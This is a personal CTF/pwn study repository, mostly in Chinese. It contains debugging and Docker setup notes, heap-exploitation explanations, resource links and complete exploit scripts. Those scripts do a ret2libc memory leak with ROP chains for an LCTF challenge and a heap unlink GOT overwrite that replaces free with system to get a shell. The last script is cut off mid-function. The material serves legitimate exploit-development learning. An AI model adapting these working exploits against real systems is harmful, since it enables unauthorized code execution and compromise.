进入`gdb`,指定源码目录(比如malloc) 143 | ```bash 144 | pwndbg> dir /usr/src/glibc/glibc-2.26/malloc 145 | Source directories searched: /usr/src/glibc/glibc-2.26/malloc:/usr/src/glibc/glibc-2.26:$cdir:$cwd 146 | ──────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────── 147 | 3052 #define MAYBE_INIT_TCACHE() 148 | 3053 #endif 149 | 3054 150 | 3055 void * 151 | 3056 __libc_malloc (size_t bytes) 152 | ► 3057 { 153 | 3058 mstate ar_ptr; 154 | 3059 void *victim; 155 | 3060 156 | 3061 void *(*hook) (size_t, const void *) 157 | 3062 = atomic_forced_read (__malloc_hook); 158 | ``` 159 | 160 | ### Docker 161 | 162 | 写好Dockerfile之后 163 | ``` 164 | # 构建image,注意网络配置 165 | sudo docker build --network=host -t csaw:warmup . 166 | # 运行 注意端口映射 167 | sudo docker run -p 8000:8000 csaw:warmup 168 | ``` 169 | 具体`docker`相关的配置在`docker_env`里面 170 | 171 | ### Centos 相关 172 | 173 | centos可能默认开了防火墙 所以端口都是关闭的 但是关闭防火墙又不太好,所以开放对应端口就好了 174 | 175 | - 通过命令开启允许对外访问的网络端口(这里是23333): 176 | ```bash 177 | /sbin/iptables -I INPUT -p tcp --dport 23333 -j ACCEPT 178 | /etc/rc.d/init.d/iptables save 179 | /etc/rc.d/init.d/iptables restart 180 | /etc/init.d/iptables status// 查看端口是否开放 181 | ``` 182 | ### 关闭alarm 183 | 184 | alarm比较烦,不方便调试 185 | 186 | handle SIGALRM print nopass 可以用来把alarm关掉(实际上我也没法gdb调试, 不知道为什么) 187 | 188 | ### 加载信息 189 | ```bash 190 | info proc map 查看各个库加载信息然后寻找 "/bin/sh" 字符串 191 | strings: 查看文件中可见字符串 192 | strings -a -t x /lib32/libc.so.6 | grep "/bin/sh" 193 | objdump -d stack7 | grep "ret" 可以用来查找ret指令 194 | objdump -x [filename] 打印头文件信息以及区段信息 195 | objdump -T libc.so | grep gets 196 | ``` 197 | ### 查找gadgets 198 | ```bash 199 | ROPgadget --binary level4 --only "pop|ret" 200 | ROPgadget --binary libc.so.6 --only "pop|ret" | grep rdi 201 | objdump -d ./level5 202 | __libc_csu_init这个函数里找 ROP 203 | objdump -d -j.plt pwn | grep write 查找write函数地址 204 | ``` 205 | ## 4. 
Knowledge 206 | QAQ 207 | 208 | ### 基础知识 209 | 210 | #### 覆盖`x86_64 ret libc` 211 | 执行call操作时栈内已经存放了传递的变量,call将当前地址压入栈中,作为返回地址,然后执行jmp到指定函数位置。构造call system时可以利用这个先存放一个地址,然后跳转。 212 | #### ROP 213 | 基础技能了,不过自己经常是会忘,都要照着汇编来看参数传递顺序≧ ﹏ ≦ 214 | 215 | 附上文章[uaf_io find system](http://uaf.io/exploitation/misc/2016/04/02/Finding-Functions.html) 216 | #### uaf 217 | pwnable 218 | 219 | #### double free 220 | 主要就是堆的大小要十分的清楚 221 | #### unlink 222 | 一般都是结合其他的一些漏洞一起用 223 | 224 | #### off-by-one 225 | 孤独的1byte 226 | 227 | #### shrink 228 | 就是改变堆大小进行进一步利用 229 | 230 | #### `IO_FILE` 231 | 这个是文件流相关的利用,著名的有`house of orange` 232 | 233 | ### 一些坑 234 | 235 | #### 关于DynELF 236 | 有一定的成功率,不过如果网速或者服务器不过关,这个方法并不是很好,dl-resolve相对易成功一点。baidu杯那个不知道是不是这个原因QAQ 237 | #### 其他的坑 238 | to be continued 239 | 240 | ## 5. resources 241 | 242 | ### [pwnable](http://pwnable.kr/play.php) 243 | 主要linux elf为主 比较适合开拓思路和入门,做过一点,不过因为懒,有点荒废了 244 | 245 | 配上[writeup-rickgray](http://rickgray.me/2015/07/24/toddler-s-bottle-writeup-pwnable-kr.html)食用更佳 246 | ### [io](http://io.netgarage.org/) 247 | 还没来得及看,主要是有arm的 248 | 249 | ### [LiveOverFlow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) 250 | youtube有相关视频 从他的视频学了不少 251 | ### [CTF writeup](https://github.com/ctfs) 252 | 各种writeup (大多国外),感觉国内各ctf都参照了很多国外的比赛 253 | ### CTFer-bin 254 | 255 | - [muhe](http://o0xmuhe.me/) 256 | - [hackfun](https://www.hackfun.org/) 257 | - [Icemakr](http://0byjwzsf.me/) LCTF2016 pwn出题大大 258 | - [Zing](http://l-team.org/) 259 | - [tang](http://bigtang.org/) 260 | - [uaf](http://uaf.io/) 国外一位,各种ctf wp都有他的身影 261 | 262 | ### [resource recommend](http://www.pentest.guru/index.php/2016/01/28/best-books-tutorials-and-courses-to-learn-about-exploit-development/) 263 | 各种资源,看了晕 264 | ### [DEF CON](https://www.defcon.org/#) 265 | 知名hacker团队 266 | ### [tisiphone](https://tisiphone.net/) 267 | 推送多 有心得体会系列文章可以看看 268 | 269 | -------------------------------------------------------------------------------- /Pwn/docker_env/Docker.base: 
-------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | MAINTAINER pwnBase 3 | LABEL Description="pwn base" VERSION='1.0' 4 | 5 | #installation 6 | RUN apt-get update && apt-get upgrade -y 7 | RUN apt-get install -y build-essential socat 8 | -------------------------------------------------------------------------------- /Pwn/docker_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubpwn:base 2 | MAINTAINER pwn_test 3 | LABEL Description="mpwn test" VERSION='1.0' 4 | 5 | #user 6 | RUN adduser --disabled-password --gecos '' bxs1 7 | RUN chown -R root:bxs1 /home/bxs1/ 8 | RUN chmod 750 /home/bxs1 9 | RUN touch /home/bxs1/flag.txt 10 | RUN chown root:bxs1 /home/bxs1/flag.txt 11 | RUN chmod 440 /home/bxs1/flag.txt 12 | RUN chmod 740 /usr/bin/top 13 | RUN chmod 740 /bin/ps 14 | RUN chmod 740 /usr/bin/pgrep 15 | RUN export TERM=xterm 16 | 17 | WORKDIR /home/bxs1/ 18 | COPY bxs1.c /home/bxs1 19 | COPY flag.txt /home/bxs1 20 | 21 | #compile 22 | RUN gcc -o bxs1 bxs1.c 23 | 24 | EXPOSE 2333 25 | CMD su bxs1 -c "socat -T10 TCP-LISTEN:2333,reuseaddr,fork EXEC:/home/bxs1/bxs1" 26 | -------------------------------------------------------------------------------- /Pwn/docker_env/README.md: -------------------------------------------------------------------------------- 1 | ## 说明 2 | 3 | 利用docker来构建pwn环境比较安全和方便,不过也有一些不方便的地方。比如printf格式化输出的问题,端口映射之后不能打印字符串等。 4 | 5 | >参考0ctf2016 pwn的工程 6 | 7 | ## 配置 8 | 创建了两个Dockerfile 9 | 10 | ### Dockerfile.base 11 | ``` 12 | sudo docker build --network=host -t ubpwn:base . 13 | ``` 14 | 生成一个基础镜像,主要下载一些要用的固件和服务。需要指定网络模式host,否则不能联网下载。 15 | 16 | ### Dockerfile 17 | ``` 18 | sudo docker build --network=host -t bxs:pwn1 . 
19 | ``` 20 | 生成最终的镜像可以直接通过以下命令运行 21 | ``` 22 | sudo docker run -p 2333:2333 bxs:pwn1 23 | ``` 24 | 注意端口映射 25 | 26 | ### 导出镜像 27 | ``` 28 | docker save -o pwndocker.tar pwn1:pwn1 29 | ``` 30 | 31 | ### 导入镜像 32 | ``` 33 | sudo docker load --input pwndocker.tar 34 | ``` 35 | -------------------------------------------------------------------------------- /Pwn/examples/README.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | 学习过程的一些简单例子 3 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/README.md: -------------------------------------------------------------------------------- 1 | ## tips 2 | 主要是读取内存 泄露地址的时候利用特征进行操作 3 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/README.md: -------------------------------------------------------------------------------- 1 | ## 溢出点 2 | 很明显在40068E那个函数里典型rettolibc 3 | ``` 4 | .text:0000000000400692 sub rsp, 40h 5 | .text:0000000000400696 lea rax, [rbp+var_40] 6 | .text:000000000040069A mov edx, 10 7 | .text:000000000040069F mov esi, 0C8h 8 | .text:00000000004006A4 mov rdi, rax 9 | .text:00000000004006A7 call read_bytes 10 | ``` 11 | 这里只有0x40的栈空间,而却是读0xc8的字节 12 | 加上ebp, 填充0x40+0x08就能到ret的地址了 13 | 14 | ## ????? 15 | 没有给so库 16 | -脸懵逼。。。可以dl-resolve. 
17 | 参考了l-ctf官方wp 18 | 19 | ## Tips 20 | ``` 21 | *1 22 | def gadget_arg1(func_addr, arg): 23 | payload = overwrite 24 | payload += p64(poprdiret_addr) 25 | payload += p64(arg) 26 | payload += p64(func_addr) 27 | payload += p64(vulnfunc_addr) 28 | return payload 29 | *2 30 | def gadget_call(func_addr, arg1=0, arg2=0, arg3=0, init_ret1=movcall_addr, init_ret2=vulnfunc_addr): 31 | payload = overwrite 32 | payload += p64(pop5ret_addr) 33 | payload += p64(0) # rbx 34 | payload += p64(1) # rbp 35 | payload += p64(func_addr) 36 | payload += p64(arg3) + p64(arg2) + p64(arg1) 37 | payload += p64(init_ret1) # call 38 | payload += '\x00'*(7*0x8) # pop7 39 | payload += p64(init_ret2) # 最后返回到有漏洞的地方下次再次利用 40 | return payload 41 | ``` 42 | 43 | 注意上面这两个函数。
44 | 1.最后是ret所以func_addr应该是plt段的函数地址, 45 | 例如.plt [puts] = 0x400500
46 | 调用的时候是rip先到0x400500(这里的指令对应jmp 0x7???????)然后跳到该函数真正地址
47 | 但是如果ret 0x601018(这是got表 里面存的是真正的函数地址的值) 就会执行0x601018这个地址对应的值(转换成code)
48 | 49 | 2.是call func_addr, 所以必须是got的地址
50 | .got[read] = 0x601028
51 | 调用的时候是call 0x601028(call的是真正的函数的地址 比如call 0x7ff????????)
52 | 但是如果用ret 就会ret到0x601028 rip指向0x601028 明显不是真正func_addr的地址
53 | 54 | 所以 总结来说就是
55 | ret 后面必须是 .plt
56 | __libc_init 里用call来必须是 .got的 57 | 58 | ## 主要函数 59 | ``` 60 | def exp(sys_addr): 61 | # read(0, rwdata_addr, 0x08) 写入8个字节字符串 62 | payload = gadget_call(read_got, arg1=0, arg2=rwdata_addr, arg3=0x10) 63 | payload += 'D'*(200-len(payload)) 64 | p.send(payload) 65 | log.info('Sending system address and binsh') 66 | p.send('/bin/sh\x00'+p64(sys_addr)) 67 | p.recvuntil('bye~\n') 68 | # 检查一下 69 | leak(rwdata_addr,0x08) 70 | leak(rwdata_addr+8,0x08) 71 | # call sys "/bin/sh" 72 | payload = gadget_call(rwdata_addr+8, arg1=rwdata_addr) 73 | payload += 'D'*(200-len(payload)) 74 | p.send(payload) 75 | p.recvuntil('bye~\n') 76 | p.interactive() 77 | ``` 78 | 这里自己用的pwntools
79 | 主要是修改got表。期间出了很多问题。细心是关键。 80 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/dl_resolve/lctf_Pwn-100/pwn1003s4de5rf76tg87yhu.i64 -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/reference.py: -------------------------------------------------------------------------------- 1 | from zio import * 2 | from pwnlib.dynelf import * 3 | from pwnlib.elf import * 4 | 5 | io = zio(('127.0.0.1', 2332), print_read = COLORED(REPR, 'red'), print_write = COLORED(REPR, 'blue'), timeout = 100000) 6 | # io = zio(('119.28.63.211', 2332), print_read = False, print_write = False, timeout = 10000) 7 | # io.hint([0x4006b7]) 8 | 9 | got_read = 0x601028 10 | got_puts = 0x601018 11 | plt_puts = 0x400500 12 | adr_bss = 0x601000 13 | 14 | p_rdi_ret = 0x00400763 15 | 16 | def prepare(address): 17 | payload = 'A' * 0x48 18 | payload += l64(p_rdi_ret) 19 | payload += l64(address) 20 | payload += l64(plt_puts) 21 | payload += l64(0x400550) # program entry 22 | payload = payload.ljust(0xc8, 'A') 23 | io.w(payload) 24 | io.rtl('bye~\n') 25 | 26 | def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0): 27 | payload = l64(part1) # part1 entry pop_rbx_pop_rbp_pop_r12_pop_r13_pop_r14_pop_r15_ret 28 | payload += l64(0x0) # rbx be 0x0 29 | payload += 
l64(0x1) # rbp be 0x1 30 | payload += l64(jmp2) # r12 jump to 31 | payload += l64(arg3) # r13 -> rdx arg3 32 | payload += l64(arg2) # r14 -> rsi arg2 33 | payload += l64(arg1) # r15 -> edi arg1 34 | payload += l64(part2) # part2 entry will call [rbx + r12 + 0x8] 35 | payload += 'A' * 56 # junk 36 | return payload 37 | 38 | def getshell(adr_system): 39 | payload = 'A' * 0x48 40 | payload += com_gadget(0x40075a, 0x400740, jmp2 = got_read, 41 | arg1 = 0x0, 42 | arg2 = adr_bss + 0x80, 43 | arg3 = 0x10) 44 | payload += l64(0x400550) # program entry 45 | payload = payload.ljust(0xc8, 'A') 46 | io.w(payload) 47 | io.rtl('bye~\n') 48 | io.w('/bin/sh\x00' + l64(adr_system)) 49 | 50 | payload = 'A' * 0x48 51 | payload += com_gadget(0x40075a, 0x400740, jmp2 = adr_bss + 0x88, 52 | arg1 = adr_bss + 0x80) 53 | payload += l64(0xdeadbeef) 54 | payload = payload.ljust(0xc8, 'A') 55 | io.w(payload) 56 | io.rtl('bye~\n') 57 | 58 | def leak(address, size): 59 | count = 0 60 | buf = '' 61 | while count < size: 62 | prepare(address + count) 63 | # leak(str(address + count)) 64 | while True: 65 | ch = io.read(1, timeout = 0x10) 66 | #print ch 67 | count += 1 68 | if ch == '\n': 69 | buf += '\x00' 70 | break 71 | else: 72 | buf += ch[0] 73 | leak_data = buf[:size] 74 | #print '{} ==> {}'.format(hex(address), leak_data.encode('hex')) 75 | return leak_data 76 | 77 | # manual leak libc 78 | BITS = 64 79 | 80 | # get arbitrary address located in libc 81 | def get_elf_entry(got): 82 | entry = l64(leak(got, 0x8)) 83 | print '[+] libc entry\t\t\t\t:\t0x%x' % entry 84 | return entry 85 | 86 | # find libc base according to Magic 87 | def find_elf_base(entry): 88 | if BITS == 64: 89 | libc_base = entry & 0xfffffffffffff000 90 | while True: 91 | garbage = leak(libc_base, 0x4) 92 | if garbage == '\x7fELF': 93 | break 94 | libc_base -= 0x1000 95 | print '[+] libc base\t\t\t\t:\t0x%x' % libc_base 96 | return libc_base 97 | 98 | # find program header table 99 | def find_phdr(elf_base): 100 | if BITS == 
64: 101 | # get address of program header table 102 | phdr = l64(leak(elf_base + 0x20, 0x8)) + elf_base 103 | print '[+] program headers table\t\t:\t0x%x' % phdr 104 | return phdr 105 | 106 | # find dynamic section table (.dynamic section -> DYNAMIC segment) 107 | def find_dyn_section(phdr, elf_base): 108 | if BITS == 64: 109 | phdr_ent = phdr 110 | while True: 111 | garbage = l32(leak(phdr_ent, 0x4)) 112 | # p_type of dynamic segment is 0x2 113 | if garbage == 0x2: 114 | break 115 | phdr_ent += 0x38 116 | dyn_section = l64(leak(phdr_ent + 0x10, 0x8)) + elf_base 117 | print '[+] .dynamic section headers table\t:\t0x%x' % dyn_section 118 | return dyn_section 119 | 120 | def find_sym_str_table(dyn_section): 121 | if BITS == 64: 122 | dyn_ent = dyn_section 123 | dt_sym_tab = 0x0 124 | dt_str_tab = 0x0 125 | while True: 126 | garbage = l64(leak(dyn_ent, 0x8)) 127 | if garbage == 0x6: 128 | dt_sym_tab = l64(leak(dyn_ent + 0x8, 0x8)) 129 | elif garbage == 0x5: 130 | dt_str_tab = l64(leak(dyn_ent + 0x8, 0x8)) 131 | if dt_str_tab and dt_sym_tab: 132 | break 133 | dyn_ent += 0x10 134 | print '[+] symtab\t\t\t\t:\t0x%x' % dt_sym_tab 135 | print '[+] strtab\t\t\t\t:\t0x%x' % dt_str_tab 136 | return (dt_sym_tab, dt_str_tab) 137 | 138 | def find_func_adr(dt_sym_tab, dt_str_tab, func, elf_base): 139 | if BITS == 64: 140 | sym_ent = dt_sym_tab 141 | while True: 142 | garbage = l32(leak(sym_ent, 0x4)) 143 | name = leak(dt_str_tab + garbage, len(func)) 144 | if name == func: 145 | break 146 | sym_ent += 0x18 147 | adr_func = l64(leak(sym_ent + 0x8, 0x8)) + elf_base 148 | print '[+] %s loaded address\t:\t0x%x' % (func, adr_func) 149 | return adr_func 150 | 151 | # exploit ELF 152 | def lookup(func): 153 | entry = get_elf_entry(got_read) 154 | elf_base = find_elf_base(entry) 155 | phdr = find_phdr(elf_base) 156 | dyn_section = find_dyn_section(phdr, elf_base) 157 | dt_sym_tab, dt_str_tab = find_sym_str_table(dyn_section) 158 | func_address = find_func_adr(dt_sym_tab, dt_str_tab, 
func, elf_base) 159 | return func_address 160 | 161 | leak(got_read, 0x8) 162 | adr_system = lookup('__libc_system') 163 | print '[+] system addr\t:\t' + hex(adr_system) 164 | 165 | getshell(adr_system) 166 | io.itr() 167 | -------------------------------------------------------------------------------- /Pwn/examples/dl_resolve/lctf_Pwn-100/solve.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from pwn import * 3 | #from zio import * 4 | import socket, struct, binascii 5 | import telnetlib 6 | 7 | elf = ELF('./pwn1003s4de5rf76tg87yhu') 8 | 9 | if True: 10 | #context.log_level = 'debug' 11 | p = process('./pwn1003s4de5rf76tg87yhu') 12 | else: 13 | p = remote('127.0.0.1', 12345) 14 | 15 | puts_plt = elf.symbols['puts'] #0x4005b0 # : objdump -d -j.plt pwn | grep puts 16 | read_plt = elf.symbols['read'] #0x4005e0 # : objdump -d -j.plt pwn | grep read 17 | log.info('plt.puts: ' + hex(puts_plt)) 18 | log.info('plt.read: ' + hex(read_plt)) 19 | 20 | puts_got = elf.got['puts'] # 0x601020 21 | read_got = elf.got['read'] # 0x601038 22 | log.info('got.puts: ' + hex(puts_got)) 23 | log.info('got.read: ' + hex(read_got)) 24 | 25 | rwdata_addr = 0x601000 # = = attention 26 | 27 | overwrite = 'A'*(0x40 + 8) 28 | 29 | poprdiret_addr = 0x400763 # ROPgadget --binary welpwn --only "pop|ret" | grep rdi 30 | # 40075a: 5b pop %rbx 31 | pop5ret_addr = 0x40075a # __libc_csu_init 32 | movcall_addr = 0x400740 # __libc_csu_init 33 | 34 | vulnfunc_addr = 0x400550 # exploit address 35 | 36 | 37 | def gadget_arg1(func_addr, arg): 38 | payload = overwrite 39 | payload += p64(poprdiret_addr) 40 | payload += p64(arg) 41 | payload += p64(func_addr) 42 | payload += p64(vulnfunc_addr) 43 | return payload 44 | 45 | def gadget_call(func_addr, arg1=0, arg2=0, arg3=0, init_ret1=movcall_addr, init_ret2=vulnfunc_addr): 46 | payload = overwrite 47 | payload += p64(pop5ret_addr) 48 | payload += p64(0) # rbx 49 | payload += p64(1) # rbp 50 | payload 
+= p64(func_addr) 51 | payload += p64(arg3) + p64(arg2) + p64(arg1) 52 | payload += p64(init_ret1) # call 53 | payload += '\x00'*(7*0x8) # pop7 54 | payload += p64(init_ret2) # 最后返回到有漏洞的地方下次再次利用 55 | return payload 56 | 57 | def leak(address, n_size): 58 | count = 0 59 | buf = '' 60 | payload = gadget_arg1(puts_plt, address) 61 | payload += 'D'*(200-len(payload)) 62 | p.send(payload) 63 | p.recvuntil('bye~\n') 64 | while countname_ptr, length); // 这里length也是输入的,但是这里没有对length检查,所以在new创建的size如果小于这个,就会发生堆溢出 20 | ``` 21 | 22 | ## 利用原理 23 | small chunk // large chunk 在某相邻的chunk free之后, 该chunk对前后的chunk检查, 如果为free, 就进行向前或向后何必, 并且把检查到的free chunk从bins双链表中删除 24 | 25 | 由linux堆的结构可以知道,如果创建了chunk1,再创建chunk2(这里可以说是name_ptr指向的地方),chunk的头部信息首先是 26 | 27 | ```shell 28 | 0x00 pre chunk size 29 | 0x08 chunk size |N|M|P| P=0 : pre chunk free 30 | 0x10 fd 31 | 0x18 bk 32 | ``` 33 | 其中主要P表示前一堆块是否被使用 34 | 35 | 这里把P覆盖成0的话,就会使程序错误的执行ulink, 而且程序错误的认为name_ptr_0 是free chunk 即可以认为name_ptr_0指向了bin里的一个项 36 | ```c 37 | /* Take a chunk off a bin list */ 38 | #define unlink(AV, P, BK, FD) 39 | { 40 | FD = P->fd; //P == &chunk1 41 | BK = P->bk; 42 | if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) 43 | malloc_printerr (check_action, "corrupted double-linked list", P, AV); 44 | else 45 | { 46 | FD->bk = BK; 47 | BK->fd = FD; //需要注意这里 就是把free chunk从双链表删除 48 | //large chunk do something 49 | //... 50 | } 51 | } 52 | ``` 53 | 54 | then 55 | ```C 56 | P->fd->bk = P->bk; 57 | P->fd = addr-0x18 , P->bk = value 时 58 | P->fd->bk = P->bk 相当于修改*((addr-0x18)+0x18) 为 value 59 | ``` 60 | 61 | ## 流程 62 | 主要流程是: 63 | 64 | 1. 创建三个chunk chunk[0~3] 65 | 66 | 2. edit(chunk0) 构造chunk0为free chunk并且覆盖下chunk1的头部 67 | 68 | 3. 然后释放chunk1 触发unlink 修改0x6016d0(name_ptr 0的地址)为前面的一地址(0x6016b8) 69 | 70 | 4. 调用edit(chunk0) 对0x6016b8那一段空间的值更改, 而且刚好能够更改到name_ptr 0的地址(更改为got表中free的地址) 71 | 72 | 5. 调用list(0)就可以leak出真实的free地址, 然后计算真实的system函数地址, 绕过ASLR 73 | 74 | 6. 
再次调用edit(0) 对got表中free更改, 更改为4中获得的system函数地址, 那么之后只要调用free, 就相当于调用system 75 | 76 | 7. 只要之前把chunk3那边写有"/bin/sh"相关字符串的free掉, 就能执行system了 77 | 78 | 8. 第一次搞orz 照着别人的自己理解的改(抄)了下 79 | 80 | ### 计算system函数地址 81 | 利用libc库中的free函数地址 82 | 83 | ```shell 84 | objdump -T lib.so.6 | grep system 85 | 86 | 本机的so库: lib_sys_addr = 0x0000000000046590 87 | 88 | lib_free_addr = 0x0000000000082d00 89 | 90 | 提供的so库: lib_sys_addr = 0x0000000000046640 91 | 92 | lib_free_addr = 0x0000000000082df0 93 | 94 | system_addr = free_addr - lib_free_addr + lib_sys_addr 95 | ``` 96 | 97 | ### 遇到的坑 98 | 1. size 99 | ```C 100 | data_0 = 'p'*(first_size-0x20) // 这里伪造的时候填充的数据需要减去头部信息, 而不是new时候的大小 101 | ``` 102 | 103 | 2. size_1 = p64(second_size + 0x10) 104 | 这里要注意第二个块的大小是加上头部的pre chunk size和自身chunk size 并没有fd和bk
105 | 106 | 3. 读取leak出的free地址 107 | 108 | 样例用的是zio 而我自己用pwn
109 | 110 | 这个真是坑惨了, 搞了好几个小时(不知道为什么没法调试), 结果就是读取的时候没有把地址转换对orz(我好菜啊)
111 | 112 | 我用的转换方法好笨orz 其实最简单的是用zio的l64
113 | 114 | ```python 115 | return l64(io.read(16).decode('hex')) 116 | 117 | recv_addr = p.read(8 * 2) #这里注意对读取的地址进行适当的转换 118 | ret_addr = '' 119 | for i in range(8): 120 | ret_addr += recv_addr[2*i+1] + recv_addr[2*i] 121 | print type(recv_addr), len(recv_addr), recv_addr 122 | print type(ret_addr), len(ret_addr), ret_addr 123 | return int(ret_addr[::-1], 16) 124 | ``` 125 | 126 | ## Reference 127 | 128 | 1. [Linex 堆](http://tyrande000.how/2016/02/20/linux%E4%B8%8B%E7%9A%84%E5%A0%86%E7%AE%A1%E7%90%86/) 129 | 130 | 2. [linux 堆 上](https://jiji262.github.io/wooyun_articles/drops/Linux%E5%A0%86%E7%AE%A1%E7%90%86%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%20(%E4%B8%8A%E5%8D%8A%E9%83%A8).html) 131 | 132 | 3. [linux 堆 下](https://jiji262.github.io/wooyun_articles/drops/Linux%E5%A0%86%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90(%E4%B8%8B%E5%8D%8A%E9%83%A8).html) 133 | 134 | 4. [linux 堆 unlink利用](http://tyrande000.how/2016/03/21/linux%E5%A0%86%E6%BA%A2%E5%87%BA%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90/) 135 | 强网杯”网络安全挑战赛WriteUp 136 | -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/libc.so.6 -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/libc.so.6.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Pwn/examples/heap/unlink/libc.so.6.i64 -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/payload.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | from pwn 
import * 3 | 4 | p = process('./shellman') 5 | #p = remote('127.0.0.1', 12345) 6 | 7 | def list_sh(): 8 | p.recvuntil('>') 9 | p.sendline('1') 10 | p.recvuntil('SHELLC0DE 0: ') 11 | recv_addr = p.read(8 * 2) #这里注意对读取的地址进行适当的转换 12 | ret_addr = '' 13 | for i in range(8): 14 | ret_addr += recv_addr[2*i+1] + recv_addr[2*i] 15 | print type(recv_addr), len(recv_addr), recv_addr 16 | print type(ret_addr), len(ret_addr), ret_addr 17 | return int(ret_addr[::-1], 16) 18 | 19 | def new_sh(sh_str): 20 | p.recvuntil('>') 21 | p.sendline('2') 22 | p.recvuntil(':') 23 | p.sendline(str(len(sh_str))) 24 | p.recvuntil(':') 25 | p.send(sh_str) 26 | p.recvuntil('Successfully created a new shellcode.') 27 | 28 | 29 | def edit_sh(number, sh_str): 30 | p.recvuntil('>') 31 | p.sendline('3') 32 | p.recvuntil(':') 33 | p.sendline(str(number)) 34 | p.recvuntil(':') 35 | p.sendline(str(len(sh_str))) 36 | p.recvuntil(':') 37 | p.send(sh_str) 38 | 39 | def del_sh(number): 40 | p.recvuntil('>') 41 | p.sendline('4') 42 | p.recvuntil(':') 43 | p.sendline(str(number)) 44 | 45 | def main(): 46 | # 创建两个chunk 47 | first_size = 0xa0 48 | second_size = 0xa0 49 | new_sh('A'*first_size) 50 | new_sh('B'*second_size) 51 | new_sh('/bin/sh;') 52 | # 构造第一个区的信息 53 | PREV_IN_USE = 0x1 54 | prev_size_0 = p64(0) 55 | size_0 = p64(first_size | PREV_IN_USE) 56 | fd_0 = p64(0x6016d0 - 0x18) 57 | bk_0 = p64(0x6016d0 - 0x10) # 0x6016c0可以从bss段找到 加上flag 和 length的偏移就是第一个name_ptr了 58 | data_0 = 'p'*(first_size-0x20) # 去掉header 这里是构造chunk0为free chunk 所以算上fd和bk 59 | prev_size_1 = p64(first_size) 60 | size_1 = p64(second_size + 0x10) # 0x10为header大小 因为不是free chunk 所以没有fd和bk 61 | payload1 = prev_size_0 + size_0 + fd_0 + bk_0 + data_0 #first fake free chunk 62 | payload1 += prev_size_1 + size_1 #second chunk header 63 | edit_sh(0, payload1) # 覆盖chunk 64 | # 触发unlink 65 | del_sh(1); 66 | free_got_addr = 0x0000000000601600 67 | # *0x6016d0 = 0x6016d0 - 0x18 即shell_0的name_ptr已经变成了shell_0的首地址 68 | rubbish = p64(0x0) # 这里从程序看 
0x6010b8 是无关紧要的 69 | is_shellcode_exist = p64(0x1) # flag 70 | shellcode_size = p64(0xa) # 要打印的字符串长度 10*%02x 71 | libc_free_got = p64(free_got_addr) # got表中free的地址 72 | payload2 = rubbish + is_shellcode_exist + shellcode_size + libc_free_got 73 | # leak 74 | edit_sh(0, payload2) 75 | free_address = list_sh() 76 | print "free_address:", hex(free_address) 77 | # 计算system地址 78 | lib_sys_addr = 0x0000000000046590 # 如果在本机测试, 用ldd查看下程序装载的so库, 然后到该库中objdump -T 查找对应函数就好了 79 | lib_free_addr = 0x0000000000082d00 80 | #lib_sys_addr = 0x46640 # 这里是在提供的so中找到的 81 | #lib_free_addr = 0x82df0 82 | system_addr = free_address - lib_free_addr + lib_sys_addr 83 | print "system_addr:", hex(system_addr) 84 | # 修改got表中free地址为system 85 | edit_sh(0, p64(system_addr)) 86 | # 触发free(实际上已经修改成了system) 87 | del_sh(2) 88 | p.interactive() 89 | 90 | main() 91 | -------------------------------------------------------------------------------- /Pwn/examples/heap/unlink/refer_exp.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | from pwn import * 3 | from zio import * 4 | 5 | p = process('./shellman') 6 | #p = remote('127.0.0.1', 12345) 7 | 8 | def list_sh(): 9 | p.recvuntil('>') 10 | p.sendline('1') 11 | p.recvuntil('SHELLC0DE 0: ') 12 | recv_addr = p.read(16).decode('hex') 13 | print recv_addr 14 | return l64(recv_addr) 15 | 16 | def new_sh(sh_str): 17 | p.recvuntil('>') 18 | p.sendline('2') 19 | p.recvuntil(':') 20 | p.sendline(str(len(sh_str))) 21 | p.recvuntil(':') 22 | p.send(sh_str) 23 | 24 | 25 | def edit_sh(number, sh_str): 26 | p.recvuntil('>') 27 | p.sendline('3') 28 | p.recvuntil(':') 29 | p.sendline(str(number)) 30 | p.recvuntil(':') 31 | p.sendline(str(len(sh_str))) 32 | p.recvuntil(':') 33 | p.send(sh_str) 34 | 35 | def del_sh(number): 36 | p.recvuntil('>') 37 | p.sendline('4') 38 | p.recvuntil(':') 39 | p.sendline(str(number)) 40 | 41 | def main(): 42 | # 创建两个chunk 43 | first_size = 0xa0 44 | second_size = 0xa0 45 | 
